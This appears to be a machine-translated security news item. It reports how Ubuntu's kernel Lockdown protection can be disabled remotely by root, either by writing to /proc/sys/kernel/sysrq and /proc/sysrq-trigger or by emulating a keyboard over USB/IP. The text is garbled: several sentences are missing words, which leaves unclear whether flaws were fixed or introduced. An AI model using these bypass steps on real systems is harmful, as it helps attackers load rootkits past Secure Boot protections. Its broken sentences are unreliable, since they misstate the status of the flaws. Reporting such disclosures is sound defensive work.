Andrey Konovalov from Google way to disable protection remotely offered in the Linux kernel package supplied with Ubuntu (theoretically, the proposed methods work with the kernel of Fedora and other distributions, but these have not been tested).
Lockdown restricts root access to the kernel and blocks UEFI Secure Boot bypass paths. For example, lockdown mode restricts access to /dev/mem, /dev/kmem, /dev/port, /proc/kcore, debugfs, debug mode kprobes, mmiotrace, tracefs, BPF, PCMCIA CIS (Card Information Structure), some interfaces CPU ACPI and MSR registers, blocks kexec_file and kexec_load calls, prohibits sleep mode, limits the use of DMA for PCI devices, prohibits importing ACPI code from EFI variables, does not allow manipulations with I / O ports, including changing the interrupt number and an I/O port for the serial port.
The Lockdown mechanism has recently been added to the core of the Linux kernel. , but it is still implemented in the form of patches or supplemented with patches in the kernels supplied with distributions. One of the differences between add-ons provided in distributions and the implementation built into the kernel is the ability to disable the provided lock when there is physical access to the system.
In Ubuntu and Fedora, the key combination Alt+SysRq+X is provided to disable Lockdown. It is understood that the Alt+SysRq+X combination can only be used with physical access to the device, and in the case of remote hacking and obtaining root access, the attacker will not be able to disable Lockdown and, for example, load an unsigned module with a rootkit into the kernel.
Andrey Konovalov showed that keyboard-based methods of confirming the user's physical presence are inefficient. The easiest way to disable Lockdown would be programmatically pressing Alt+SysRq+X via /dev/uinput, but this option is disabled by default. At the same time, we managed to identify at least two more ways to substitute Alt + SysRq + X.
The first method involves using the "sysrq-trigger" interface - for simulation, it is enough to enable this interface by writing "1" to /proc/sys/kernel/sysrq, and then writing "x" to /proc/sysrq-trigger. Specified loophole in the December update of the Ubuntu kernel and in Fedora 31. It is noteworthy that developers, as in the case of /dev/uinput, initially block given method, but blocking didn't work due to in code.
The second method is related to keyboard emulation through and then sending the Alt+SysRq+X sequence from the virtual keyboard. The USB/IP core shipped with Ubuntu is enabled by default (CONFIG_USBIP_VHCI_HCD=m and CONFIG_USBIP_CORE=m) and provides the usbip_core and vhci_hcd digitally signed modules required for operation. The attacker can virtual USB Device, network handler on the loopback interface and connecting it as a remote USB device using USB/IP. About said method Ubuntu developers, but no fix has been released yet.
Source: opennet.ru